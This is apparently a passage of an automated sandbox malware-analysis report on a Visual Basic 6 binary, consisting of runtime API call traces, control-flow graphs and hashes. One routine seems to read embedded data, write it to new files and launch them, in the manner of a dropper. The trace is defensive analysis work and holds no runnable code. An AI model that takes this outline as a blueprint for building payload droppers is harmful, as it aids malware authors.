                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418D39
                                                                                                                                                              • Part of subcall function 00418C90: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418D42
                                                                                                                                                              • Part of subcall function 00418C90: __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 00418D53
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,?,?,00000000,004025E6), ref: 00418D62
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrToAnsi.MSVBVM60(00000001,?,00000000,00000001,00000000,?,?,?,00000000,004025E6), ref: 00418D75
                                                                                                                                                              • Part of subcall function 00418C90: __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,00000000,004025E6), ref: 00418D85
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418D93
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418DA1
                                                                                                                                                              • Part of subcall function 00418C90: __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,00000000,004025E6), ref: 00418DB1
                                                                                                                                                              • Part of subcall function 00418C90: __vbaSetSystemError.MSVBVM60(?,?,00000000,004025E6), ref: 00418DCA
                                                                                                                                                              • Part of subcall function 00418C90: __vbaFreeStr.MSVBVM60(00418E07,?,00000000,004025E6), ref: 00418DEE
                                                                                                                                                              • Part of subcall function 00418C90: __vbaFreeStr.MSVBVM60(?,00000000,004025E6), ref: 00418DF7
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 00408B0A
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408B22
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 00408B36
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408B43
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408B53
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408B6B
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 00408B7F
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408B8C
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408B9C
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408BB4
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 00408BC8
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408BD5
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408BE5
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408BFD
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 00408C11
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408C1E
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408C2E
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408C46
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Move$Copy$Free$List$CheckHresult$ErrorNew2$#517$Bstr$#516#631AnsiChkstkSystemUnicode$File$#525#537#570#580#600#616#618#648#669Get3OpenSeek
                                                                                                                                                            • String ID: ;$MGH+$2
                                                                                                                                                            • API String ID: 2419524798-2363849171
                                                                                                                                                            • Opcode ID: 4922fd86914f0d1911d26fd6260cb31160d45723a23d8febec2101ce13e3e991
                                                                                                                                                            • Instruction ID: 93bf0c189370be62b4749cd89f90093835801c62d3816994bc11815577fef7f0
                                                                                                                                                            • Opcode Fuzzy Hash: 4922fd86914f0d1911d26fd6260cb31160d45723a23d8febec2101ce13e3e991
                                                                                                                                                            • Instruction Fuzzy Hash: 59B2FB71900218EFDB14DFA0DD48BEEBBB5FB48305F10816AE206B72A4DB745A85CF59

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            control_flow_graph 343 411590-41167e __vbaChkstk __vbaStrCopy * 3 __vbaOnError #648 __vbaFreeVar __vbaI2I4 __vbaFileOpen __vbaI2I4 #570 __vbaLenBstr 344 411684-411687 343->344 345 411cff-411d05 __vbaErrorOverflow 343->345 344->345 346 41168d-41169b 344->346 347 4116a1-411770 __vbaLenBstr #525 __vbaStrMove __vbaI2I4 __vbaFileSeek __vbaI2I4 __vbaGet3 __vbaStrCopy call 40ee70 __vbaStrMove call 40ee70 __vbaStrMove __vbaStrCmp __vbaFreeStrList 346->347 348 41179f-4117b6 __vbaI2I4 __vbaFileClose 346->348 355 411781-411798 __vbaI2I4 __vbaFileClose 347->355 356 411772-4117c8 347->356 350 411c91-411ce7 __vbaFreeStr * 5 348->350 355->350 356->345 359 4117ce-411816 __vbaI2I4 __vbaFileSeek __vbaI2I4 __vbaGet3 356->359 359->345 360 41181c-41181f 359->360 360->345 361 411825-4118d3 __vbaI2I4 __vbaFileSeek call 40fba0 #648 __vbaFreeVar __vbaI2I4 __vbaFileOpen #525 __vbaStrMove 360->361 364 4118d9-4118e6 361->364 365 4119d6-411acb __vbaI2I4 __vbaFileClose call 40fba0 #648 __vbaFreeVar __vbaI2I4 __vbaFileOpen __vbaI2I4 __vbaFileClose #580 __vbaI2I4 __vbaFileOpen #525 __vbaStrMove 364->365 366 4118ec-4118f9 364->366 374 411ad1-411ade 365->374 366->345 367 4118ff-411905 366->367 369 411907-411951 __vbaI2I4 __vbaGet3 __vbaI2I4 __vbaPut3 367->369 370 41195c-411969 367->370 369->345 372 411957-41195a 369->372 370->345 373 41196f-411972 370->373 375 4119d1 372->375 373->345 376 411978-4119cb #525 __vbaStrMove __vbaI2I4 __vbaGet3 __vbaI2I4 __vbaPut3 373->376 377 411ae4-411af1 374->377 378 411bdb-411c8b __vbaI2I4 __vbaFileClose __vbaI2I4 __vbaFileClose __vbaStrCat __vbaStrMove __vbaStrCat #600 __vbaFreeStr __vbaFreeVar #600 374->378 375->364 376->375 377->345 379 411af7-411afd 377->379 378->350 380 411b54-411b61 379->380 381 411aff-411b49 __vbaI2I4 __vbaGet3 __vbaI2I4 __vbaPut3 379->381 380->345 383 411b67-411b6a 380->383 381->345 382 411b4f-411b52 381->382 384 411bc9-411bd6 #598 382->384 383->345 385 411b70-411bc3 #525 __vbaStrMove __vbaI2I4 __vbaGet3 __vbaI2I4 __vbaPut3 383->385 384->374 385->384
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,00409C6C,00000000,00000000), ref: 004115AE
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004115DB
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004115E7
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004115F3
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 00411602
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 00411621
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00411630
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?), ref: 00411644
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00411652
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00411662
                                                                                                                                                            • #570.MSVBVM60(00000000), ref: 00411669
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 00411676
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 004116AD
                                                                                                                                                            • #525.MSVBVM60(00000000), ref: 004116B4
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004116BF
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004116CF
                                                                                                                                                            • __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 004116DA
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004116EA
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 004116F7
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 0041170C
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 00411720
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                              • Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 00411735
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(00000000), ref: 0041173C
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0041175E
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,00000000,004025E6), ref: 0041178B
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000,?,?,00000000,004025E6), ref: 00411792
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004117A9
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000), ref: 004117B0
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004117DB
                                                                                                                                                            • __vbaFileSeek.MSVBVM60(?,00000000), ref: 004117E6
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004117F6
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000004,?,00000000), ref: 00411803
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00411832
                                                                                                                                                            • __vbaFileSeek.MSVBVM60(00000001,00000000), ref: 0041183B
                                                                                                                                                              • Part of subcall function 0040FBA0: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,00000000,?,00000000,004025E6), ref: 0040FBBE
                                                                                                                                                              • Part of subcall function 0040FBA0: __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,004025E6,?), ref: 0040FBEE
                                                                                                                                                              • Part of subcall function 0040FBA0: #580.MSVBVM60(00000000,00000000,00000000,?,00000000,?,00000000,004025E6,?), ref: 0040FC1A
                                                                                                                                                              • Part of subcall function 0040FBA0: #529.MSVBVM60(00004008), ref: 0040FC38
                                                                                                                                                            • #648.MSVBVM60(0000000A,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041186A
                                                                                                                                                            • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411879
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041188D
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041189B
                                                                                                                                                            • #525.MSVBVM60(00001000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004118AD
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004118B8
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411911
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041191E
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041192E
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041193B
                                                                                                                                                            • #525.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411979
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411984
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411994
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004119A1
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004119B1
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004119BE
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004119E0
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004119E7
                                                                                                                                                            • #648.MSVBVM60(0000000A,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A16
                                                                                                                                                            • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A25
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A39
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A47
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A57
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A5E
                                                                                                                                                            • #580.MSVBVM60(?,00000026,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A71
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A85
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A93
                                                                                                                                                            • #525.MSVBVM60(00001000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411AA5
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411AB0
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B09
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B16
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B26
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B33
                                                                                                                                                            • #525.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B71
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B7C
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B8C
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B99
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411BA9
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411BB6
                                                                                                                                                            • #598.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411BD0
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411BE5
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411BEC
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411BFC
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C03
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00406BF8,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C19
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C24
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C31
                                                                                                                                                            • #600.MSVBVM60(00000008,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C47
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C56
                                                                                                                                                            • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C5F
                                                                                                                                                            • #600.MSVBVM60(00004008,00000000), ref: 00411C85
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(00411CE8), ref: 00411CBD
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,00000000,004025E6), ref: 00411CC6
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,00000000,004025E6), ref: 00411CCF
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,00000000,004025E6), ref: 00411CD8
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,00000000,004025E6), ref: 00411CE1
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60 ref: 00411CFF
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Free$FileMove$CloseGet3$#525$CopyOpenPut3$#516#631#648BstrErrorSeek$#580#600Chkstk$#529#537#570#598ListOverflow
                                                                                                                                                            • String ID: E
                                                                                                                                                            • API String ID: 1020712489-3568589458
                                                                                                                                                            • Opcode ID: dd04ee743c3aedb4f20eed2c2bd3a439915ce7c229051d87dfabd16d575bf736
                                                                                                                                                            • Instruction ID: 2c3bdc2995cc32bb6ddafcd024d806e85dbf0c974109c8e670926915eacf5b68
                                                                                                                                                            • Opcode Fuzzy Hash: dd04ee743c3aedb4f20eed2c2bd3a439915ce7c229051d87dfabd16d575bf736
                                                                                                                                                            • Instruction Fuzzy Hash: 8322E6B1900249EBDB04DFE0DA48ADEBBB5FF48305F108129E602B76A0DB745A85DB58

                                                                                                                                                            Control-flow Graph (starting at block 408d7c-408d87; legend: Executed, Not Executed)
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,0040614C), ref: 00408DB5
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408DC0
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408DCE
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408DD9
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408DE5
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408DF0
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408DFD
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408E08
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408E16
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408E21
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408E2D
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408E38
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408E46
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408E51
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408E5E
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408E69
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408E75
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408E80
                                                                                                                                                              • Part of subcall function 00410180: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,00409D5A,00000000), ref: 0041019E
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004101CE
                                                                                                                                                              • Part of subcall function 00410180: __vbaAryConstruct2.MSVBVM60(?,004068A0,00000003,?,?,?,00000000,004025E6), ref: 004101DF
                                                                                                                                                              • Part of subcall function 00410180: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 004101EE
                                                                                                                                                              • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(0000000F,00000000,?,?,?,00000000,004025E6), ref: 0041020A
                                                                                                                                                              • Part of subcall function 00410180: __vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128), ref: 00410244
                                                                                                                                                              • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0041025A
                                                                                                                                                              • Part of subcall function 00410180: __vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?), ref: 00410273
                                                                                                                                                              • Part of subcall function 00410180: #525.MSVBVM60(00000104), ref: 0041029C
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrMove.MSVBVM60 ref: 004102A7
                                                                                                                                                              • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 004102DE
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrToAnsi.MSVBVM60(?,?,000001F4), ref: 00410338
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000009,?,?,?,?,?,?,?,?,?,00000000), ref: 00408EB2
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,0040614C), ref: 00408ECE
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408ED9
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408EE7
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408EF2
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408EFE
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408F09
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408F16
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408F21
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408F2F
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408F3A
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408F46
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408F51
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408F5F
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408F6A
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408F77
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408F82
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408F8E
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408F99
                                                                                                                                                              • Part of subcall function 00410180: __vbaGenerateBoundsError.MSVBVM60 ref: 0041031D
                                                                                                                                                              • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(?,?,00000000), ref: 0041035E
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrToUnicode.MSVBVM60(?,?,?,00000000), ref: 0041036F
                                                                                                                                                              • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60(?,00000000), ref: 00410384
                                                                                                                                                              • Part of subcall function 00410180: #616.MSVBVM60(?,?,?,00000000), ref: 00410399
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrMove.MSVBVM60(?,00000000), ref: 004103A7
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrMove.MSVBVM60(?,?,00000000), ref: 004103BE
                                                                                                                                                              • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60(?,00000000), ref: 004103CA
                                                                                                                                                              • Part of subcall function 00410180: __vbaLenBstr.MSVBVM60(?,?,00000000), ref: 004103DB
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrCat.MSVBVM60(?,0040614C,?,00000001,?,00000000), ref: 00410402
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrMove.MSVBVM60(?,00000000), ref: 00410410
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrCat.MSVBVM60(0040614C,00000000,?,00000000), ref: 0041041C
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrMove.MSVBVM60(?,00000000), ref: 0041042A
                                                                                                                                                              • Part of subcall function 00410180: __vbaInStr.MSVBVM60(00000001,00000000,?,00000000), ref: 00410433
                                                                                                                                                              • Part of subcall function 00410180: __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000), ref: 00410459
                                                                                                                                                              • Part of subcall function 00410180: __vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128,?,00000000), ref: 0041049A
                                                                                                                                                              • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(?,00000000,?,00000000), ref: 004104B0
                                                                                                                                                              • Part of subcall function 00410180: __vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?,?,00000000), ref: 004104C9
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000009,?,?,?,?,?,?,?,?,?,00000000), ref: 00408FCB
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,0040614C), ref: 00408FE7
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408FF2
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409000
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040900B
